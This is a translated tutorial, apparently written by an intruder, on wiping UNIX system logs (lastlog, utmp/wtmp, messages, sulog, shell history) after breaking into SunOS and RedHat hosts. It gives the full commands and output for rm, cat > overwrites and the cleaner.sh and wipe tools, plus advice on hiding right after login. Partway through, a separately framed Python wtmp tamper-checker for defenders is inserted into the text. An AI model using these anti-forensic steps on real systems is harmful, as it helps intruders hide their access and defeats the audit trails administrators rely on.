Clear system logs

Source: Internet
Author: User

Because so many different systems are involved, it is impossible to cover the logs of every UNIX-class system, but most of them are similar. Below I will only use the common SunOS and RedHat as examples; for other systems, see the relevant documentation.

UNIX system log files are usually kept in /var/log and /var/adm. You can check the logging configuration by reading syslog.conf, for example: cat /etc/syslog.conf.

On SunOS they are under /var/log and /var/adm; /usr/adm is a link to /var/adm.

On RedHat they are under /var/log and /var/run.

The following is a listing of the log directories on SunOS 5.7.

# ls /var/adm
acct     log         messages.1  passwd     sulog  vold.log
aculog   messages    messages.2  sa         utmp   wtmp
lastlog  messages.0  messages.3  spellhist  utmpx  wtmpx

# ls /var/log
authlog          syslog    syslog.1  syslog.3
sysidconfig.log  syslog.0  syslog.2  syslog.4

The following is a listing of the log directories on RedHat 6.2.

# ls /var/log
boot.log    dmesg           messages.2     secure       uucp
boot.log.1  htmlaccess.log  messages.3     secure.1     wtmp
boot.log.2  httpd           messages.4     secure.2     wtmp.1
boot.log.3  lastlog         netconf.log    secure.3     xferlog
boot.log.4  mailllog        netconf.log.1  secure.4     xferlog.1
cron        maillog         netconf.log.2  sendmail.st  xferlog.2
cron.1      maillog.1       netconf.log.3  spooler      xferlog.3
cron.2      maillog.2       netconf.log.4  spooler.1    xferlog.4
cron.3      maillog.3       news           spooler.2
cron.4      maillog.4       normal.log     spooler.3
daily.log   messages        realtime.log   spooler.4
daily.sh    messages.1      samba          transfer.log

# ls /var/run
atd.pid       gpm.pid     klogd.pid  random-seed   treemenu.cache
crond.pid     identd.pid  netreport  runlevel.dir  utmp
ftp.pids-all  inetd.pid   news       syslogd.pid

Generally, the logs we want to clear are:

lastlog
utmp (utmpx)
wtmp (wtmpx)
messages
syslog
sulog

In addition, the various shells record the history of the commands a user has run, in a file in the user's home directory. The file name is usually .sh_history (ksh), .history (csh) or .bash_history (bash).

Generally, the logs above are the ones you erase. :)

Next I will describe what each of these logs contains and how to clear it. For more detail, and for other logs, see the relevant documentation.

First, what each of these logs does, that is, what it records.

lastlog

lastlog records the time of each user's last login and where that login came from.

When a user logs in to a UNIX system, the login program looks up the user's uid in the lastlog file. If it finds an entry, UNIX prints the last login time and tty (terminal number).

The following is an example:

SunOS 5.7

login: gao
Password:
No directory! Logging in with home=/
Last login: Sun Feb 4 22:18:25 from 211.167.1.24
Sun Microsystems Inc.   SunOS 5.7       Generic October 1998
$

The login program then updates the lastlog file with the new login time and tty, and also updates the utmp and wtmp files.

utmp

The utmp log records every user currently logged in to the system; the file changes constantly as users log in and out. It also keeps a long history of the system's users. utmp is usually stored in /etc/utmp. You can view it with the w and who commands, but other commands also read this file, for example finger. :) Nowadays utmp is generally supplemented by a utmpx file with extended records; don't forget to wipe that too. :)

wtmp

The wtmp file records user login and logout events in the same format as utmp, but it grows larger and larger as the number of logins increases. On some systems ftp access is recorded in this file as well, and it also records normal system shutdown times. You can read it with the last and ac commands.
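The utmp/wtmp record structure described above is also what a defender can check for the traces that erasing an entry leaves behind. The following added example is not part of the original article or of any tool it mentions; it assumes the 384-byte glibc x86-64 record layout (SunOS utmpx differs), and the sample records are constructed.

```python
import struct

# glibc struct utmp on x86-64 (384 bytes); Linux utmp and wtmp share this layout.
# Assumed here for the example; SunOS utmpx has a different structure.
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384
BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 2, 7, 8

def pack_record(ut_type, pid, line, user, host, tv_sec):
    """Build one raw wtmp record; used here only to construct sample data."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0)

def audit_wtmp(data):
    """Report the inconsistencies that erasing a wtmp login entry leaves behind.
    wtmp is append-only: timestamps never go backwards, no record is all zero,
    and every logout (DEAD_PROCESS) on a tty follows a login (USER_PROCESS)."""
    findings, active, last_time = [], set(), 0
    for idx, off in enumerate(range(0, len(data), UTMP_SIZE)):
        chunk = data[off:off + UTMP_SIZE]
        if len(chunk) < UTMP_SIZE:
            findings.append(f"record {idx}: truncated (size not a multiple of {UTMP_SIZE})")
            break
        if chunk == b"\0" * UTMP_SIZE:
            findings.append(f"record {idx}: all-zero record inside wtmp (entry blanked)")
            continue
        f = struct.unpack(UTMP_FMT, chunk)
        ut_type, line, tv_sec = f[0], f[2].rstrip(b"\0").decode(), f[9]
        if tv_sec < last_time:
            findings.append(f"record {idx}: timestamp goes backwards")
        last_time = max(last_time, tv_sec)
        if ut_type == USER_PROCESS:
            active.add(line)
        elif ut_type == DEAD_PROCESS:
            if line not in active:
                findings.append(f"record {idx}: logout on {line} with no matching login")
            active.discard(line)
    return findings

# Constructed sample wtmp (not a real capture): boot, two logins, two logouts.
CLEAN = b"".join([
    pack_record(BOOT_TIME, 0, "~", "reboot", "", 981000000),
    pack_record(USER_PROCESS, 1201, "pts/1", "gao", "211.167.1.24", 981000100),
    pack_record(USER_PROCESS, 1305, "pts/2", "bob", "10.0.0.5", 981000200),
    pack_record(DEAD_PROCESS, 1305, "pts/2", "", "", 981000300),
    pack_record(DEAD_PROCESS, 1201, "pts/1", "", "", 981000400),
])
# The same file after gao's login record has been blanked to zeros.
TAMPERED = CLEAN[:UTMP_SIZE] + b"\0" * UTMP_SIZE + CLEAN[2 * UTMP_SIZE:]
```

Run audit_wtmp over a real /var/log/wtmp image and any finding points at a record worth comparing against other evidence (auth logs, process accounting, network logs).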

syslog & messages

By reading /etc/syslog.conf we can see what syslog records. :)

Many programs write their log messages through it, and the syslogd daemon does the writing.

By default, most of the messages go to /var/adm/messages.

sulog

sulog is the log of the user-switching command su.

It is usually /var/adm/sulog.

If you have run su on the machine, don't forget to clear it. :)

Shell history

.sh_history (ksh), .history (csh) or .bash_history (bash) is the shell's command history: it records the commands the user has run and usually lives in the user's home directory. Don't forget root's home directory. When I intrude into a machine I often find other people's hacking records in it. :) So remember to clear it.

1. The logs are text files, so the crudest method is to open the log file in a text editor and delete the relevant records to cover your tracks and hide what you did.

For example, with vi.

But this is very clumsy: it is too much trouble and too much work.

If you have 50 machines to deal with, you'll see how busy you get.

:)

2. When I first started learning UNIX I often used rm -f to delete logs, for example rm -f /usr/adm/lastlog.

Haha.

This is stupid.

It makes it easier for administrators to notice the intrusion. Still, it is fairly reliable. :)

It can be used on less important machines.

3. Clear it with >.

For example:

# cat > /usr/log/lastlog
-> type whatever you want written here; it is better to put in something plausible, or leave it empty. :)
^D -> here ^D means press Ctrl+D.
#

If there is no log cleaning tool at hand, this is what I usually use. :)

I like to find some old log entries to overwrite it with. :)

======================================================================

4. Of course, it is best to use a log cleaning tool: type a few commands and let the program do the cleaning for you. :)

A. Common log cleaning tools.

Most rootkit packages include z2.c and wted.c. They are easy to find, and many online tutorials describe how to use them, so I won't go into them here. :) Saves time.

B. Here is a script I used for a while to clear logs: cleaner.sh in huckit.zip.

We use it like this:

# chmod 755 cleaner.sh
# ./cleaner.sh
Log cleaner v0.5b by: Tragedy/Dor
* Usage: cleaner.sh <username>
# ./cleaner.sh username

Here, username is the account whose log entries you want to clear.

:)

For example:

# ./cleaner.sh gao
Log cleaner v0.5b by: Tragedy/Dor
OS detection....
Detected SunOS
---<[ Log cleaning in process....

* Cleaning aculog (0 lines)... 0 lines removed!

* Cleaning lastlog (19789 lines)... 45 lines removed!

* Cleaning messages (12 lines)... 1 lines removed!

* Cleaning messages.0 (12 lines)... 0 lines removed!

* Cleaning messages.1 (28 lines)... 0 lines removed!

* Cleaning messages.2 (38 lines)... 0 lines removed!

* Cleaning messages.3 (17 lines)... 0 lines removed!

* Cleaning spellhist (0 lines)... 0 lines removed!

* Cleaning sulog (986 lines)... 6 lines removed!

* Cleaning utmp (179 lines)... 1 lines removed!

* Cleaning utmpx (387 lines)... 1 lines removed!

* Cleaning vold.log (0 lines)... 0 lines removed!

* Cleaning wtmp (299 lines)... 0 lines removed!

* Cleaning wtmpx (565 lines)... 0 lines removed!

* Cleaning authlog (0 lines)... 0 lines removed!

* Cleaning syslog (53 lines)... 0 lines removed!

* Cleaning syslog.0 (14 lines)... 0 lines removed!

* Cleaning syslog.1 (64 lines)... 0 lines removed!

* Cleaning syslog.2 (39 lines)... 0 lines removed!

* Cleaning syslog.3 (5 lines)... 0 lines removed!

* Cleaning syslog.4 (3 lines)... 0 lines removed!

* Cleaning syslog.5 (210 lines)... 0 lines removed!

#

One problem with this /bin/sh script is that you must have uid 0, that is, be root.

With only euid 0 it does not work properly and reports insufficient permission.

Solution: change its #!/usr/sh line to point at the suid shell you set up for yourself. :)

One advantage of this script is that it needs no compiling and works on several systems, such as RedHat and SunOS.

You can also use

cat > clog.sh

to paste it onto the host, so there is no need to fetch it with ftp. :)

It also clears most of the logs with a single command, which is why I often use it.

But it cleans too thoroughly and deletes the earlier records as well. :(

And sometimes it is not clean enough: lastlog and utmp, for example, sometimes fail to be cleared.

So now I usually use two tools to clear logs. The other one I will introduce next. :)

Next, another log cleaner that I think is better. :)

It is wipe-1.00.tgz in huckit.zip.

It can completely clear:

lastlog
utmp
utmpx
wtmp
wtmpx

:)

Let's take a look (the demo platform is SunOS 5.7).

# gzip -d wipe-1.00.tgz
# tar -xf wipe-1.00.tar
# cd wipe-1.00
# ls -al
total 32
drwxr-xr-x  2 root  root    512 Feb  4 20:48 .
drwxrwxrwx  6 root  other  1024 Feb  4 18:40 ..
-rw-r--r--  1 root          130 Jan  9  1997 install
-rw-r--r--  1 root  staff  1389         1997 makefile
-rw-r--r--  1 root          498 Jan  9  1997 readme
-rw-r--r--  1 root  staff 10027         1997 wipe.c
# make
wipe v0.01!
usage: 'make <system>' where system types are:
linux freebsd sunos4 solaris2 ultrix
aix irix digital bsdi netbsd hpux
#

We can see that it requires a system option. The options are:

linux freebsd sunos4 solaris2 ultrix
aix irix digital bsdi netbsd hpux

To clear a system's logs, you must compile it on that same kind of system.

For example, to compile on a Linux such as RedHat: make linux.

On FreeBSD: make freebsd.

On SunOS 4: make sunos4.

On SunOS 5 and above: make solaris2.

Here we use make solaris2, since SunOS 5 and above is called Solaris.

# make solaris2
gcc -O3 -DHAVE_LASTLOG_H -DHAVE_UTMPX -o wipe wipe.c
# ls -al
total 94
drwxr-xr-x  2 root  root    512 Feb  4 21:03 .
drwxrwxrwx  6 root  other  1024 Feb  4 18:40 ..
-rw-r--r--  1 root          130 Jan  9  1997 install
-rw-r--r--  1 root  staff  1389         1997 makefile
-rw-r--r--  1 root          498 Jan  9  1997 readme
-rwxr-xr-x  1 root  other 30920 Feb  4 21:03 wipe
-rw-r--r--  1 root  staff 10027         1997 wipe.c
# ./wipe
Usage: wipe [uwla] ...options...
UTMP editing:
  erase all usernames       : wipe u [username]
  erase one username on tty : wipe u [username] [tty]
WTMP editing:
  erase last entry for user : wipe w [username]
  erase last entry on tty   : wipe w [username] [tty]
LASTLOG editing:
  blank lastlog for user    : wipe l [username]
  alter lastlog entry       : wipe l [username] [tty] [time] [host]
  where [time] is in the format [yymmddhhmm]
ACCT editing:
  erase acct entries on tty : wipe a [username] [tty]

That is how the compiled wipe is used.

The u option erases utmp and utmpx entries.

The w option erases wtmp and wtmpx entries.

The l option erases lastlog entries.

The a option erases /var/adm/pacct entries (this is generally not needed :).

[tty] is the terminal number. It selects which entry to clear when several sessions of the same account are logged in at the same time, and of course it has to be your own terminal number. :)

You can find the terminal number with the w command.

For example:

# w
  1 user,  load average: 0.00, 0.00, 0.01
User     tty           login@  idle   JCPU   PCPU  what
gao      pts/1                                  3  w

The following is my own usage on SunOS 5.7. :)

# w
  1 user,  load average: 0.00, 0.00, 0.01
User     tty           login@  idle   JCPU   PCPU  what
gao      pts/1                                  3  w

# ./wipe u gao
Patching /var/adm/utmp ... done.
Patching /var/adm/utmpx ... done.
# w
  1 user,  load average: 0.00, 0.00, 0.01
User     tty           login@  idle   JCPU   PCPU  what
# ./wipe w gao
Patching /var/adm/wtmp ... done.
Patching /var/adm/wtmpx ... done.
# ./wipe l gao
Patching /var/adm/lastlog ... done.

OK.

lastlog, utmp, utmpx, wtmp and wtmpx are wiped.

Did you notice the wipe u gao?

Why did I run the w command?

Haha.

Think about it.

So we usually run wipe u gao right after logging in to the system, to hide ourselves. :)

Of course, we must not forget the shell history.

# ls -al /.*history
-rw-------  1 root  other  456 20:27 .sh_history
# rm -f .*history
# cd
# pwd
/home/gao
# ls -al /.*history
-rw-------  1 root  other  456 20:27 .sh_history
# rm -f .*history

OK. Put these programs into a script, and one run gives you basic safety. :)

Of course, if you understand the system better, you will find that this approach still has problems. :)

 
